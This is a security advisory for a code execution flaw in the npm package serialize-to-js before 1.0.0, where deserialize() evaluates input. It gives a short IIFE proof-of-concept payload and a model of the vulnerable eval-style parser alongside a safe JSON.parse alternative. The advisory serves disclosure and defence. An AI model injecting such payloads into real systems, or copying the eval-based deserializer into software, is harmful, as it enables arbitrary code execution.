Description
Code Execution Through IIFE in serialize-to-js
Affected versions of serialize-to-js are vulnerable to arbitrary code execution: deserialize() evaluates untrusted input as JavaScript, so an Immediately Invoked Function Expression (IIFE) embedded in the data is executed.
Proof of Concept
// Deliberately vulnerable usage from the advisory: the string is evaluated, so the IIFE inside it runs.
var payload = "{e: (function(){ eval('console.log(`exploited`)') })() }";
var serialize = require('serialize-to-js');
serialize.deserialize(payload); // prints "exploited" on affected versions
Recommendation
Update to version 1.0.0 or later, and review the author's disclaimer on deserialize() in the package documentation.
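To make the data-versus-code distinction concrete, the added example below (not code from the serialize-to-js project) models the eval-style behaviour the advisory describes and contrasts it with a JSON-only parser that cannot execute anything; the payload is a constructed variant of the PoC whose only side effect is setting a witness flag. The eval-style model is an assumption about how pre-1.0.0 deserialize() behaved.

```javascript
// Model of the vulnerable behaviour (assumption: serialize-to-js < 1.0.0
// evaluates its input through Function/eval). Any function expression in
// the string is executed, which is exactly what the advisory warns about.
function evalStyleDeserialize(str) {
  return new Function('return (' + str + ')')();
}

// Hardened replacement: JSON.parse only accepts data, never code.
// Non-JSON input (unquoted keys, function expressions, ...) is rejected.
function safeDeserialize(str) {
  try {
    return { ok: true, value: JSON.parse(str) };
  } catch (err) {
    return { ok: false, error: err.name };
  }
}

// Constructed sample input modelled on the advisory's PoC. The IIFE's side
// effect is reduced to flipping a flag so that execution is observable
// without doing anything harmful.
const witness = { executed: false };
globalThis.__advisoryWitness = witness;
const payload =
  "{e: (function(){ globalThis.__advisoryWitness.executed = true; return 1 })() }";

// Runs both deserializers over the same payload and reports what happened.
function demo() {
  const unsafeResult = evalStyleDeserialize(payload); // IIFE runs here
  const safeResult = safeDeserialize(payload);        // rejected: not JSON
  return {
    unsafeExecutedCode: witness.executed, // true: code ran during parsing
    unsafeValue: unsafeResult.e,          // 1: the IIFE's return value
    safeRejected: !safeResult.ok,         // true: JSON.parse refused it
    safeError: safeResult.error,          // 'SyntaxError'
  };
}
```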
References
- https://nvd.nist.gov/vuln/detail/CVE-2017-5954
- https://github.com/commenthol/serialize-to-js/issues/1
- https://github.com/commenthol/serialize-to-js/commit/1cd433960e5b9db4c0b537afb28366198a319429
- https://github.com/advisories/GHSA-mm62-wxc8-cf7m
- https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution
- https://www.npmjs.com/advisories/313
- https://www.npmjs.com/package/serialize-to-js#deserialize
- http://www.securityfocus.com/bid/96223
Packages
Name: serialize-to-js (npm)
Affected versions: < 1.0.0
Fixed version: 1.0.0
Related vulnerabilities
CVSS3: 9.8 | Source: nvd | Published: almost 9 years ago
An issue was discovered in the serialize-to-js package 0.5.0 for Node.js. Untrusted data passed into the deserialize() function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).